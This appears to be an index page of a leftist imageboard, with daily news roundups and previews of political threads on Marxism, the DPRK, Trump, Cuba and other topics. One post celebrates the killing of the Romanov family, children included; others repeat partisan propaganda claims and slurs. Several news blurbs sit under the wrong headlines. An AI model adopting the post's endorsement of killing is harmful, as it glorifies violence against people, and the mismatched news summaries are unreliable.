Belfast's Queen’s University to provide financial support to help Palestinian scholarship students with visa fees and travel
ADDITIONAL financial support is to be provided to help Palestinian students take up scholarships at Queen’s University Belfast. It comes a few months after Queen’s vice-chancellor Ian Greer announced the extension of the existing Copty Scholarship from one to four students to support academics and students at risk across the world.

‘I’m a person again’: the Ukrainian convicts recruited to fight the war
The convicted killer is one of 3,800 inmates freed early under a new scheme designed to plug gaps in Ukraine’s armed forces. After two and a half years of all-out war, the government in Kyiv is struggling to find recruits. In May, it passed legislation allowing convicts to volunteer for the army, having previously rejected the idea.

Veteran anti-whaling activist arrested in Greenland
The 73-year-old will be brought before a district court with a request to detain him pending a decision on his potential extradition to Japan, police said. Footage posted by his foundation on X showed officers handcuffing Mr Watson on the John Paul DeJoria ship, putting him inside a police van and driving him away.

Colombia's Petro pushes for public healthcare and better workers' rights
For health care, Mr Petro wants a government agency to be in charge of collecting billions of pounds in insurance fees from Colombians, side lining the private insurance companies that currently manage much of the health system. For the labour sector, he wants to make it harder for companies to hire workers on temporary contracts and also require employers to pay workers full wages on rest days.

After 45 days in prison, Daniel Jadue is dismissed as Mayor of Recoleta
The trial has been seen by several experts as revenge against Jadue for implementing programs that attacked the economic interests of several powerful economic groups, as well as an attempt to stop the political rise of the communist mayor.

Violence against Brazil's Indigenous people unabated under Lula, report says
While Lula's government resumed the enforcement against illegal invasions of recognized ancestral lands, there were 208 murders of Indigenous people last year, mainly with gunshots, compared to the previous highest number on record of 182 murders in 2020, CIMI said, citing data from the Brazilian health ministry. … CIMI reported the involvement of police in private militias that are being investigated for Indigenous deaths. The police act as escorts for farmers, sharing information and supporting attacks against some communities such as the Guarani and Kaiowá in southern Brazil, according to the report.
R: 192 / I: 35

The "Anti-Woke Left"

So it should go without saying that there are a lot of things to rightfully criticize about modern idpol and social justice politics.

But at the same time i've begun to find "leftist critics of wokeness" extremely annoying. They're whole schtick is basically just yelling incessantly about how bourgeois identitarians and "PMCs" have taken over the left and are preventing us from talking about REAL issues. But than they almost never talk about those issues, they just complain about the people who DON'T talk about them. Like, these people claim to be above meaningless culture war nonsense but yet literally all they do is engage with it.

Which gets into my next point, a lot of "critiquing idpol from the left" basically boils down to "agreeing with the right but leftishly". Communities like r/stupidpol are basically indistinguishable from right-wing rage bait forums. And a lot of people who started out as left-wing social justice skeptics like Aimee Terese or the Red Scare chicks have since transformed into full-fledged rightoids ranting about immigration and talking about how we need more patriotism in society. Which makes me think that their belief in leftist principles was never really that strong to begin with.

I think as much as a lot of these types of "leftists" complain about the woke they share two very crucial things in common with them: they view racism and sexism as bigger problems in society than capitalism. And they are generally very disconnected from the concerns of the actual working class
R: 95 / I: 10 (sage)

Why is porky crushing tech workers?

Why is porky crushing tech workers?

according to some stats, there are half the tech workers in the US are unemployed. Is this because tech-porky is trying to crush a section of the working class that has more negotiating power?
R: 225 / I: 58


So global IT is imploding because of widely used IT company Crowdstrike pushed a faulty security update to it's clients that are mostly companies and gov institutions and their computers and systems are now blue screening. The world is in chaos.

Effect range is global and financial cost are already said to be incalculable.

>SYDNEY, July 19 (Reuters) - A cyber outage related to an issue at global cybersecurity firm Crowdstrike (CRWD.O), hit media, retailers, banks, airlines and telecoms companies across Australia and New Zealand on Friday.

>Australia's largest bank, Commonwealth Bank said some customers had been unable to transfer money due to the service outage. National airline Qantas and Sydney airport said planes were delayed but still flying.

R: 25 / I: 7
What do you think of Paul Lafargue and his book “The Right to Be Lazy”?
R: 96 / I: 18
Genuine question. Will it be over for Cuba as a socialist country in a few years? I want to believe in it but how will they overcome these brutal sanctions and US backed color revolutionary attempts in the upcoming years? What do the people especially the young folk currently say?
R: 89 / I: 43

Marx would endorse DPRK

Juche ideology was created to adapt to the specific material conditions of North Korea. People who cling to orthodox Marxism and thus don’t recognize the successes of the DPRK are idealists who made Marxism into their idea. The Workers Part of Korea is the Proletarian party and the DPRK is the dictatorship of the proletariat. The elections aren’t rigged, that is CIA propaganda. North Korea actually has more parties than America does. Voter consensus is simply what naturally happens when democracy actually exists rather than the workers being brainwashed by plutocrats. If you try to imagine what the dictatorship of the proletariat actually looks like in practice, the DPRK is the only thing you can come up with. Anything else is just LARPing fantasies no better than Anarcho Primitivism.
R: 84 / I: 15


An anarchist told me marx already moved on from the idea of state centralization by the end of his life:

>by the time he died Marx's vision of communism had largely moved from the emancipation working class by means of the centralization of the productive forces in the hands of the state to decentralization and a network of independent federated communes as pointed out (in picrel)

<This is why I'm continually baffled by people talking about Marxism in terms of early 19th century political strategy when even Marx had moved on from the kind of ideas mentioned in the manifesto.
is this true?
R: 48 / I: 4

What does leftypol think of Ali Shariati?

>idealogue of the Iranian revolution
>tried to synthesize Islam and socialism
>murdered by the SAVAK 1978
so what does leftypol think of this guy?
R: 27 / I: 6

Has MAGAtards memory been erased from 2016?

I managed to sit thru about 30 minutes of Trump's RNC speech. His transformation into a generic neocon has finally been completed. JD Vance as his VP pick all but solidified it

My question is how are people falling for this scam again? I'm not talking about MAGAcommunist larpers or shitposters from /pol/ but like the general public is now thinks Trump is based and Biden is cringe so that's how the pendulum has swung

Do people forget when Trump ran on the anti-establishment bit the first time, and then immediately after he won he called the Clintons "good people" and proceeded to fill his cabinet with fortune 500 execs and cia spooks?

The War in Ukraine is set to cool down or atleast major tensions be eased regardless of who's in office, Trump will just deliver the message in some WWE style manner where he "strongarms" Putin into accepting some deal he was going to accept anyway

So what are they going to do when Project 2025 doesn't happen besides the standard neolib shit like massive deregulation and tax cuts and contiuned military spending?

Or Trump openly calling for faster green card status for immigrants to continue to prop up america's service sector?
R: 3 / I: 0

News 7/20/24

Yemen: Israel confirms airstrikes targeting Yemen's Hodeidah port
The official spokesperson for the Houthis, Nasruddin Amer, described the Israeli airstrike on the oil tanks and power facility at Hodeidah port as "a brutal act of aggression against Yemen aimed at worsening the suffering of its people and pressuring Yemen to halt its support for Gaza." The Israeli military announced that it carried out strikes on the Red Sea port city of Hodeidah in Yemen earlier on Saturday.

Israel army chief demands Netanyahu accept Gaza ceasefire deal with Hamas
Herzi Halevi's move during a security discussion prompted Prime Minister Benjamin Netanyahu to end the session, the sources cited by Israeli news website Walla reported.

HPG: 5 soldiers killed and 2 positions destroyed
According to the statement, guerrillas struck positions of the Turkish invasion forces in the Dergelê region in Metîna on Friday evening. The guerrillas used light and semi-automatic weapons and initially destroyed two positions. When the Turkish army tried to intervene from other positions, the guerrillas struck again and destroyed two more positions. Four soldiers were killed during the course of the action.

Lammy announces restoration of UNRWA funding but rejects Israel arms embargo
Today, Foreign Secretary David Lammy told MPs that he was “reassured” by the review, and announced that the government would recommit funding and deliver £21 million.

Five protesters and one police officer hurt in French reservoir demonstration
Droughts in France have heightened tensions over water resources, and critics say building large reservoirs to feed agricultural irrigation is a wasteful practice that favours large farms. On Saturday, the protesters gathered in front of a site belonging to Soufflet Négoce, a grains trading business owned by French cooperative group InVivo, before setting off on their march through the city.

EU seals 'historic' pact on Serbia's lithium deposits
Representatives of lithium battery-makers also looked on as Serbia and the EU signed an agreement to establish a “strategic partnership on sustainable raw materials, battery production chains and electric vehicles”.

Thousands of Ukrainian IDPs are struggling to adapt amid housing, employment crises
Experts told the Kyiv Independent that the most critical issues for IDPs include the lack of proper and affordable housing, financial instability, difficulties in finding employment, and deteriorating mental health. Due to the insufficient support, some IDPs eventually return to their front-line or even occupied settlements, again facing the direct threats of the war.

Colombia jails businessman for stealing development funds
The judge also ordered businessman Luis Fernando Duque to pay a $1.7 million fine for his role in the so-called Centros Poblados scandal. The corruption scandal broke in 2021 and ended plans by the government of former President Ivan Duque to create 7,000 internet hotspots in regions that were off the grid.

Land Defenders Shut Down a Toxic Mine. Now Its Corporate Backers Want Damages.
It announced on June 17 that it was seeking arbitration against Mexico under the Comprehensive and Progressive Agreement for Trans-Pacific Partnership (CPTPP) — a so-called free-trade agreement that includes Mexico and Canada. The company is claiming financial losses from the Mexican government, including the voiding of mineral titles and refusal to issue an environmental permit.

Bangladesh police given ‘shoot-on-sight’ orders amid national curfew
Police in Bangladesh have been granted “shoot-on-sight” orders and a nationwide curfew has been imposed as student-led protests continue to roil the country, leaving more than 100 people dead. The curfew, imposed at midnight on Friday, was expected to last until Sunday morning as police tried to bring the swiftly deteriorating security situation under control, with military personnel patrolling the streets of the capital.

Imran Khan’s media adviser ‘abducted’ in Pakistan days before House of Lords event, party says
CCTV footage released== by the party appears to show Ahmed Janjua, who works as the opposition Pakistan Tehreek-e-Insaf (PTI) party’s international media coordinator, being taken into custody at around 4am on Saturday.
R: 11 / I: 0

Heavenly Kingdom Thoughts

What do you think of the Taiping Heavenly Kingdom? I heard the CCP looks relatively favorable towards them as a proto-communistic peasant rebellion (as much as a Revolutionary syncretic Christian cult can be) and after reading God’s Chinese Son, I get the impression that it could have had the potential to modernize through the founders cousin, Hong Rengan who had experiences interacting and learning about the west in Hong Kong, though infighting is always a danger and what helped it collapse. I don’t know, what do you guys think of this historical anomaly?
R: 112 / I: 24 (sage)
Ok, I still don't get it. why should I be a communist?

>better worker rights

well, people can be dicks so I have no reason to believe that ill actually get better working conditions. and even if I do, all it would take is one corrupt leadership to ruin everything. at least I can leave my job and switch my career without asking for the governments permission under capitalism.
>no more rich fucks controlling your life
as opposed to other fucks in position of power? money isn't the only source of power you know. you ever heard of social hierarchical dynamics? nepotism? favoritism? narcissism? sociopathy?
I can have access to neetbux under crapitalism
>you will never be out of jobs
why would I want to always be working? or forced to work?
I can't even choose to starve (yes. willingly starve) or go innawoods under communism. it's either work or the gulag.
R: 46 / I: 14

Fascism and ART

There's a reason fascism is so obsessed with aesthetics: fascism is interested in the ability of an artistic object to enforce an authority's mythical/magical/theological presence in its absence, or in other words, its ritual function. "Aesthetics" gives art that aura by turning it into a theology, by conferring on it a sort of genius or essence above its material-ness, (the importance of its uniqueness, its indescribable beauty, etc.). The alternative use of art is its political, emancipatory function which strips art of its ritual purpose by removing It's presence. Fascism attempts to organize the newly created proletarian masses without affecting the property structure which the masses strive to eliminate. Fascism sees its salvation in giving these masses not their right, but instead a chance to express themselves. The masses have a right to change property relations; Fascism seeks to give them an expression while preserving property. The logical result of Fascism is the introduction of aesthetics into political life. in other words fascism is nothing other than the ultimate form of the false consciousness of the proletariat.
R: 11 / I: 3 (sage)

Everyone of all political views is allowed to post here.

Communism is simply incompatible with reality.

It's a good idea on paper, and I think the people who tried to come up with the idea of the evolution of society had good intentions in mind. Leftists are dreamers, who think of a better way, another way of organizing life. However, as much as I agree with many criticisms of capital, it seems that the solutions provided to it resoundingly failed at providing a better alternative to the system.

Its a great idea to have workers collectively control the means of production, but in practice, it has several faults. What does it mean by workers controlling them? Anarchy? I don't even need to dissect why this is a bad idea. Worker cooperatives? Sure, but it doesn't necessarily function well in all sectors of the economy and mostly works well for agriculture. State ownership? That's simply state capitalism, the state becoming a corporation that seeks profit instead of corporations.

And there's the real crux of the issue. Marxist Leninism, the most destructive ideology out of all of the socialist ones, not to say the idea of socialism is evil though. An ideology created by the evil dictator known as Joseph Stalin, who killed millions in his reign of terror. You can argue up and down the numbers, but he still killed millions. He lead to the most objectively horrible eras of life in the Soviet Union, and thank goodness Khrushchev came in and fixed the mess he left behind. Maybe as with all things in history, there's grayness to it. They had to prepare and industrialize extremely quickly in order to combat the fascist Nazi Germany. They did not have to create GULAG labor camps, nor establish a secret police, nor starve their citizens. The plan worked, but at what cost? Human rights are extremely vital, and they cannot be pushed aside like this. They could have industrialized quickly but without most of the bloodshed. These patterns of Joseph Stalin have showed up in many different Marxist Leninist countries, showing the problem with the ideology, that it is corrupt and broken to the core.

Is there propaganda on the capitalist side? Yes. Is imperialism bad? Sure, but the USSR did it too. I'm simply stating that as flawed and broken of a system capitalism is, the other options such as anarchy and socialism isn't really much better.

The future is social liberalism, the center left according to most people but apparently center right according to communists. As much as it pains me to agree with her, I have to agree with Margaret Thatcher in that as much as we don't like it, as much flaws there is with the system, there is no other alternative that works as well as capitalism. I'm sorry, but these are just facts.

Work within the system. Be pragmatic, and work to increase the quality of life in ways that are tested and proven such as welfare, social programs, and government intervention to regulate capitalism. Focus on policies that are actionable rather than the amorphous panacea of socialism. And you might find inner peace, knowing that as flawed as the world we live in is, we have to all make the best of it we can.
R: 75 / I: 2

Why Did Slavery Fall?

Why did chattel slavery largely fall out of fashion? It intuitively seems like it was efficient, and one might assume the most efficient exploitation will dominate under capitalism (excepting legal intervention).

For the redditors: yes, slavery still exists both legally and illegally in Western countries like the USA. We know, and if you needed this written to preempt your reply then you're an arrogant prick.

Understanding this may hold insight into ways dominant modes of production have been and can be usurped.
R: 62 / I: 10

Leftists' Stance on Ataturk

What do leftists from around the world think about Ataturk? Was he a revolutionary who fought against imperialism or was he simply a bourgeois dictator? He is looked upon with favor by the Turkish Communist Party.
R: 2 / I: 0

Urban Design

What were the successes, and failures, in urban design during communist government?
I'm especially interested in countries outside of China and conversations beyond gommieblogs, just because they're so well-known.
A lot of these governments have the advantage of re/building cities from scratch in a planned way instead of having to build everything on top of legacy design choices.
R: 45 / I: 19


On this day in 1918, the Romanov family, including Tsar Nicholas II, his wife, and their children, were taken out to pasture. I’m glad this happened because there’s only one way to deal with fascists and monarchists. Remember that and remain steadfast, anons.
R: 3 / I: 1

News 7/19/24

Drone attack on Israel’s Tel Aviv leaves one dead, at least 10 injured
The Israeli military said it had opened an investigation into the large explosion near the United States embassy office in the city and would determine why the country’s air defence systems were not activated to intercept the “aerial target”. “We’re talking about a large UAV [unmanned aerial vehicle] that can fly large distances,” a military official told a briefing for journalists following the strike. “We’re not ruling out any possibilities right now.”

Israeli officer succumbs to wounds from Golan attack as Hezbollah strikes new settlement
An Israeli reserve officer died from wounds sustained from a Hezbollah attack on the occupied Golan Heights two weeks ago, as Hezbollah said it attacked a new Israeli settlement on Friday for the first time.

HPG: Four military vehicles destroyed by guerrillas
The UN’s international court of justice (ICJ) has ordered Israel to end its occupation of the Palestinian territories “as rapidly as possible” and make full reparations for its “internationally wrongful acts” in a sweeping and damning advisory opinion that says the occupation violates international law.

German Communist newspaper Junge Welt vows to fight on after setback for press freedom
Lawyers for the OPC said the paper is Marxist-Leninist and that this was unconstitutional in Germany as laid down by the banning of the German Communist Party in 1956. The legal costs of more than €115,000 (£96,000) must be borne by the paper’s publisher 8. Mai GmbH.

Macron ally wins surprise re-election as national assembly speaker
With 220 votes in the third round, Yaël Braun-Pivet, 53, in a surprise move beat leftwing candidate André Chassaigne, who received 207 votes. Seats in the 577-strong assembly are now divided between three similarly sized blocs.

Student protesters storm prison and free hundreds of inmates in Bangladesh
A communications blackout was imposed across the country, with mobile internet access and social media blocked by the government as student-led protests continued to escalate into violent clashes with police. As people woke on Friday morning, TV news channels were off air after the state broadcaster’s headquarters in Dhaka was stormed and set alight by protesters, and several news websites were down.

Vietnamese Communist leader Trong dies
As people woke on Friday morning, TV news channels were off air after the state broadcaster’s headquarters in Dhaka was stormed and set alight by protesters, and several news websites were down. A group of protesters stormed a jail in Narsingdi, a district just north of the capital, and freed its inmates before setting the facility on fire. According to Agence France-Presse, hundreds of inmates were released.

Nigeria's unions, government agree new wage deal, averting strike
Nigeria's main labour unions agreed on a new minimum wage of 70,000 naira ($44) a month on Thursday after talks with the government, ending months of deadlock and the threat of strikes.

Peru extends pre-trial detention for former president Castillo
Peru's judiciary said on Thursday it was extending the pre-trial detention of former President Pedro Castillo by 18 months while an investigation against him on charges of rebellion continues.

Tons of dead fish cover major river in Brazil after alleged dumping of industrial waste
The initial investigation points to an “irregular discharge of wastewater” from the Sao Jose Sugar and Alcohol company plant in the community of Rio das Pedras and it reached a stream that flows into the Piracicaba River, prosecutors said.
R: 35 / I: 6

"Just do it, bro!"

I'm literally a communist of 15+ yrs and have been working in this given factory for 7 months and "radicalizing" fellow proles without proper party/union backing is a bitch.

Can't be done.

No matter that I slowly worm myself in. Without proper party/union backing I amount to shit!

>pic unrel
R: 3 / I: 0
The reason that the USSR became revisionist under Stalin is that he changed the position of head of state to be the party leader (or General Secretary) rather than the "Chairman of the Council of People's Commissars", a far cooler and more regimepilled title.
R: 41 / I: 5
I don't really understand regular people denying climate change. Often the fears these people express amount to little more than your classic conspiracy theory fare: climate change is a scam to somehow dispossess them of their petty property, their rights, etc. The middle-class truly is the most reactionary, stagnant class of all. Any change, especially if it is shepherded along by large political formations (e.g. states, organizations like the UN), is viewed with distrust by the petty bourgeoisie, which feels most at home in an environment of universal mediocrity and ignorance.

Climate change is not only a problem whose dimensions transcend the narrow horizon of the petty bourgeois, but it is also something their most hated and feared enemies - big capital and its state apparata - are having to make adjustments to. Thus they are naturally suspicious of it.
R: 5 / I: 0

The social architecture of capitalism

This is an interesting paper. In summary, it presents an abstract (mathematical) model of an idealized capitalist economy. It then shows how such a model actually connects the empiric economic phenomena studied separately. The list of empiric economic phenomena that it ties together is the following: i) the tendency of capital concentration and unequal distribution of wealth; ii) the distribution of firm sizes across sectors; iii) the distribution between firm size and GDP growth; iv) the distribution of recession durations; v) the distribution of firm demises; vi) the rate of profit distribution.

Not everyone has had a formal mathematical education, so understanding the statistics behind the model can be daunting. But the discussion and conclusion are understandable to everyone who wishes to read them. The main point is that the model is true to life. 

It is also based on a weak form of the labor theory of value. It also follows Marx's ideas about how social revolution comes about. Hence, it also draws some necessarily political conclusions. As the authors say

>The aim was to understand the possible economic consequences of the social relations of production considered in isolation and develop a model that included money and historical time as essential elements. The theoretical motivation for the approach is grounded in Marx’s distinction between the invariant social relations of production and the varying forces of production. Standard economic models typically do not pursue this distinction.

Italics mine. The current bourgeois political economy is based on subjective, psychological theories of value. That was true 100 years ago when Bukharin was polemicizing against Bohm-Bawker & Co. in the introduction to his "Theories of Leisure Classes." True, says Bukharin, suppose that the conclusions of your theories are based on impeccable mathematics, your methodology, and your initial assumptions are still incorrect, and as a direct consequence, your theories have no practical (economic) value. The methodology of every non-classical economist (not upholding some labor theory of value) is based on some fictive state of things, never present in human history. 

True, the model of capitalism presented in the paper is also an abstract model, never seen in human history. But the model reflects and connects different aspects of political economy credibly. It is a true reflection of real life. Its correctness is proven in its practical application.

The conclusions the author draws from his model are the following:

>The model naturally generates groups of capitalists, workers, and unemployed in realistic proportions and business cycle phenomena, including fluctuating wage and profit shares in national income. The good qualitative and, in many cases, quantitative fit between model and empirical phenomena suggests that the theory presented here captures some essential features of capitalist economies, demonstrates the causal importance of the social relations of production, and provides a basis for more concrete and elaborated models. 

Italics mine. Further

>A final and important implication of the computational deduction outlined in this paper is that some of the features of economic reality that cause political conflict, such as extreme income inequality and recessions, are necessary consequences of the social relations of production and hence enduring and essential properties of capitalism, rather than accidental, exogenous, or transitory.

I think that it's important to comment that these ideas are not new and are part of a larger chain of ideas. As far back as 1923. Henryk Grossman also presented an abstract mathematical model of capitalist production based only on the analysis Marx presents in Kapital [1]. He rediscovers Marx's methodology - he comes to the same conclusions as Marx about crisis and accumulation. This was worth deducing abstractly: the 2nd Internationale was already revising the necessity of capitalism's collapse and justifying the ruling ideas about world cartles and super-imperialism. Grossman's model was incomplete, but he couldn't have gone beyond what mathematics he had. Only in the 1950s did we start developing the tools necessary for a further understanding of capitalism. 

Grossman came to the same conclusions as the author and a bit more. From his model, he saw immediately how the economic fight and the union fight tie into the larger struggle to overthrow capitalism. Not only that. It definitely shows that 'planned' capitalism is a contradiction. It positively critiques Bukharin's, Luxemburg's, and Lenin's theories of imperialism, removing the 'external' factor (literally the external market) from the equation of imperialism and showing that it is a direct consequence of unplanned commodity production. His model also shows how the capitalist system of production must necessarily separate use-value and commodities to exist. [2]

It's a very interesting subject in its own way. You can very easily come to a revolutionary position without actually engaging directly in the economic struggle. And I believe it is true when I say that many currents of Marxism today have forgotten the necessity of a really deep understanding of economics, which is understandable given that there are other fronts where the struggle is more needed, but it would do us good to actually understand the economics of imperialism without echoing some misleading concepts. [3]

Again, the author, Ian Wright.

>It may be objected that economic actors are clearly purposive and it is therefore essential to model individual rationality, even when considering macro-level phenomena. The underlying assumption of the rational actor approach to economics is that macro phenomena are reducible to and determined by the mechanisms of individual rationality. Farjoun and Machover noted some time ago that the successful physical theory of statistical mechanics is in direct contradiction to this assumption. For example, classical statistical mechanics models the molecules of a gas as idealised, perfectly elastic billiard balls. This is of course a grossoversimplification of a molecule’s structure and how it interacts with other molecules. Yet statistical mechanics can deduce empirically valid macro-phenomena.

Italics mine. Further

>The method of abstracting from the mechanics of individual rationality, and instead emphasising the particle nature of individuals, is valid because the number of degrees of freedom of economic reality is very large. This allows individual rationality to be modelled as a highly simplified stochastic selection from possibilities determined by an overriding social architecture. The quasi-psychological motives that supposedly drive individual actors in the rational actor approach can be ignored because in a large ensemble of such individuals they hardly matter.

There seems to be a rich subject on the topic currently. Econophysics they call it. Using ideas from statistical mechanics to explain economic phenomena. Exiciting stuff!

Anyway. I didn't know where to post this. So I guess this a discussion on a topic I've presented. Here's some further reading. I've attached the pdf of the article + the econophysics book.

[1] https://www.marxists.org/archive/grossman/1929/breakdown/index.htm
[2] https://www.marxists.org/archive/grossman/1922/crises/index.htm
[3] https://marxismocritico.com/2014/01/08/henryk-grossman-capitalist-expansion-and-imperialism/
R: 148 / I: 9

Why are people, especially Americans, so accepting of what's happening?

Cost of living is rising every day, colleges are debt slave machines but parents will still push their kids into going. Rapidly rising homelessness, inflation, etc
But everyone seems to be ok with it or at least tolerant.
R: 85 / I: 24
> be me
> be an anti zionist communist in israel
> bored since it's summer break
> want to piss off some people
> decide to post an anti-idf slideshow on tiktok, just a couple pictures of text describing some of the idf's most famous horrible cases, nothing graphic in the tiktok itself
> it gets 5k views in less than a couple hours
> get a bunch of hate comments, only 3 people actually agreed with me in the comments
> my irl friend see the post since they follow me on tiktok, they're liberal
> they say the video is inappropriate on whatsapp
> i respond with "there are children dying in gaza and this is your problem with the post?"
> they respond "they're defending you and this is YOUR thanks to them??"
> i respond with the "the wehrmact also defended germany, what's your point"
> they say it's an inappropriate comparison
> i say that its appropriate
> they use the "you know they want to kill you and all jews right?????" *they're not talking about hamas, but the palestinian people as a whole*
> i say that it's hitler level racism
> they say that the children in gaza will grow up to be hamas terrorists and therefor bombing gaza is justified
> they were right folks, liberals really are nazis
> they didn't write anything ever since, i haven't replied
> fellas, should i escape this shithole to czechia or something when i have the chance, or should i stay here in a fascist society with fascist friends until something good happens here
R: 2 / I: 0

News 7/18/24

Hamas, PIJ call on PLO to withdraw its recognition of Israel
“The leaderships viewed that, in light of the Knesset’s declared position rejecting the Palestinian people’s right to establish their independent state, the national collective is required today to take a unified stance to confront these attempts to erase the Palestinian cause,” they said in a joint statement.

Three more civilians kidnapped in Turkish-occupied Afrin
According to local sources, occupying forces abducted Selah Reşid Gorîlo (20) and Mihemed Xelil Hec Qenber (24) from Xilalka village in Afrin’s Bilbilê district on 12 July. Reports say that the two men had been kidnapped for lighting the Newroz fire three months ago and released in return for ransom.

Civilian killed by Turkish airstrike amid rising tensions in Iraqi Kurdistan's Duhok
A Kurdish civilian was killed by a Turkish airstrike early on Thursday while the situation in Duhok province is deteriorating due to the ongoing Turkish army’s aggression deep into the Iraqi Kurdistan region to fight against militants of the Kurdistan Workers Party (PKK), a US-based rights organisation monitoring the situation said.

Police officer alleged to have overseen NI spying on journalist ordered to give evidence in person
The Investigatory Power Tribunal, sitting at the Royal Courts of Justice in London, is considering the cases of Trevor Birney and Barry McCaffrey. The journalists worked on the No Stone Unturned documentary film about 1994’s Lochinisland massacre. Their homes were raided by police in 2018 in response to the documentary.

Brazil's Lula gives go-ahead on review of social benefits, says minister
Earlier in July, the government announced it would cut 25.9 billion reais ($4.67 billion) in government spending through greater scrutiny of social welfare programs to remove people who are ineligible for benefits.

Dominican activists protest against a new criminal code that would maintain a total abortion ban
Besides maintaining the total abortion ban, the new criminal code would also reduce penalties for sexual violence within marriage and exclude sexual orientation from the list of characteristics protected from discrimination, affecting the LGBTQ+ community. Abortion rights activists say the country’s total abortion ban not only restricts women’s reproductive choices but risks their lives.

Uruguay’s new media law generates widespread backlash
The Media Law, among other things, seeks to allow the same person to own more radio and television channels, which would promote greater media concentration by large media companies. This would decrease diversity of opinion in Uruguayan media. Also as per the proposed law, the owners of the shares of Uruguayan media would no longer have to be Uruguayan (as the current law states), but could be foreigners.

Uber told to pay banned Sydney driver $10,000 after failing to prove passenger’s complaint
The driver, who partially relied on a Punjabi interpreter during the tribunal proceedings, had been employed as an independent contractor, which Uber calls a “driver partner”. He drove for Uber full-time, earning about $212,000, including tips in the financial year before he was terminated.

Beijing protests after Vietnam asks UN to extend South China Sea continental shelf
According to Vietnam’s foreign ministry, the country filed a submission on Thursday to the UN Commission on the Limits of the Continental Shelf (CLCS) to seek formal validation of the outer boundaries of its legal continental margin beyond the 200-nautical mile (370km) limit in a contested area of the South China Sea.

Protesters attack Bangladeshi state broadcaster after PM’s call for calm
The incensed crowd then set ablaze the network’s reception building and dozens of vehicles parked outside, a BTV official told AFP. The broadcaster said “many people” were trapped inside as the fire spread. Another official from the station later told AFP they had safely evacuated the building.
R: 16 / I: 2

Justin Trudeau

What is Left /Pol/'s opinion on Justin Trudeau? Do you like him? Why or why not? I have my opinions but I am always open to hearing the opinions of others.
R: 32 / I: 1 (sage)

Karl Marx was child-labor-pilled

<A general prohibition of child labor is incompatible with the existence of large-scale industry and hence an empty, pious wish. Its realization – if it were possible – would be reactionary, since, with a strict regulation of the working time according to the different age groups and other safety measures for the protection of children, an early combination of productive labor with education is one of the most potent means for the transformation of present-day society.

<I do not say that it is wrong that women and children should participate in our social production. I think every child above the age of nine ought to be employed at productive labour a portion of its time, but the way in which they are made to work under existing circumstances is abominable.

R: 4 / I: 2


Turkish Sikorsky army helicopter shot down at Girê Bahar
On 16 July at 1:35 a.m., the People's Defense Forces (HPG) shot down another Turkish Sikorsky army helicopter at Girê Bahar in the western Zap region of "Şehîd Delîl." The action was confirmed by the HPG Press Center that released a preliminary statement.

Turkey 'threatens' Israel with legal action after army uses Gaza hospital as base
"The photo in the Palestinian press showing a group of Israeli soldiers in front of the Turkish-Palestinian Friendship Hospital in Gaza is further evidence of Israel's violation of international law and international humanitarian law," Turkey's foreign affairs ministry said in a statement.

Far-right Israeli groups attacking Gaza aid received over $200,000 from donors
Donations to the groups have poured in on Givechack, an Israeli crowdfunding site, and JGive, a US and Israeli crowdfunding site, according to a report by the Associated Press and the Israeli investigative site, Shomrim, based on open source inspections of the websites and other public records.

Colombia’s Supreme Court removes magistrates from corruption probe after leak
The video that was leaked to Caracol contained the testimony that former UNGRD director Olmedo Lopez gave to magistrate Hector Alarcon about the alleged involvement of House Representative Wadith Mazur (Conservative Party) in the corruption scandal.

Children ‘tortured, abused’ in El Salvador’s prisons: Report
Many of those arrested have “no apparent connection to gangs’ abusive activity”, and were apparently targeted based on their physical appearance or socioeconomic background, it said.

Burhan and Abiy's secretive talks signal shifting Ethiopian position on Sudan
Abiy and Burhan’s meeting came off the back of secret talks between their countries’ military intelligence services and foreign ministries, two sources close to the Sudanese army and Port Sudan government told Middle East Eye. The visit came at Abiy’s request, they said.

Communists in Kenya renew their demand for President Ruto's resignation
The renewed demand came after police fired tear gas at peaceful protesters in Nairobi and several other towns and cities on Tuesday.

Authorities in Bangladesh urge all universities to close after six die during protests
AUTHORITIES in Bangladesh urged all universities to close today, the day after at least six people died during protests over the allocation of government jobs and police raided the headquarters of the main opposition party.

As mobilization rules kick in, some Ukrainian men pay to flee, dodging draft
The high costs and risks some men are willing to undertake to avoid conscription underscores a growing tension in Ukrainian society: More than two years after Russia’s invasion, people strongly support the military but few men who haven’t already volunteered to fight want to do so now.

European Commission didn’t provide enough information about COVID-19 vaccine deals, EU court says
The court noted that the commission failed to show why divulging the agreements’ provisions on the indemnification of the pharmaceutical companies for any damages they would have to pay in the event of a defect in their vaccines would have actually harmed their commercial interests.
R: 16 / I: 6

Opinion on the SLA

<The United Federated Forces of the Symbionese Liberation Army (commonly referred to simply as the SLA) was a small, American militant far-left organization active between 1973 and 1975; it claimed to be a vanguard movement. The FBI and wider American law enforcement considered the SLA to be the first terrorist organization to rise from the American left. Six members died in a May 1974 shootout with police in Los Angeles. The three surviving fugitives recruited new members, but nearly all of them were apprehended in 1975 and prosecuted.
what is everyones opinions on the SLA? based, cringe, or neither?
R: 103 / I: 22

South Africa May29 Election

Latest polling is picrel. Two communist parties at ~12% each. What are the implications of implications? Also: lol at the single white dude ("center" right, ofc).
R: 9 / I: 2

News 7/16/24

Israel says Eilat Port ‘bankrupt’ after months Houthi naval blockade
“It must be acknowledged that the port is in a state of bankruptcy,” explained the CEO of Eilat Port, Gideon Golber. “Only one ship has come here in recent months. The Yemenis have effectively shut off access to the port.”

Ultra-Orthodox demonstrators block key highway after IDF announces new draft plans
Under American pressure, Israel has pledged to deliver large quantities of humanitarian aid into the war-ravaged Gaza Strip. But at the same time, the U.S. and Israel have allowed tax-deductible donations to far-right groups that have blocked that aid from being delivered.

H*T*S disperses protests in Idlib | People go out on protests in 12 areas in solidarity with Binish
Protests took place in Idlib, Kafr Takharim, Armanaz, Qorqinya, Kafrouma Camps, Has Camps, Abin Sama’an, Al-Sahara, western Atma Camps, Al-Atareb, Deir Hassan and Al-Fawa’a in solidarity with Binish and the woman that was run over by a security member of HTS.

Iraqi tribes support the PKK against Turkish occupation
While the Turkish state is expanding its occupation attacks in southern Kurdistan (northern Iraq) in cooperation with the ruling KDP party, several Iraqi tribes expressed their reaction against the occupation and announced their support for the PKK.

Palestine Action shut down Elbit's Bristol HQ for the second day in a row
Three activists from the group locked themselves onto a vehicle, blocking the sole access point to the headquarters of Elbit Systems in Bristol. Police arrived at the scene and cordoned off the area. Another three activists staged a similar action the day before.

Kosovo’s ‘Commander Wolf’ Convicted of War Crimes by Hague Court
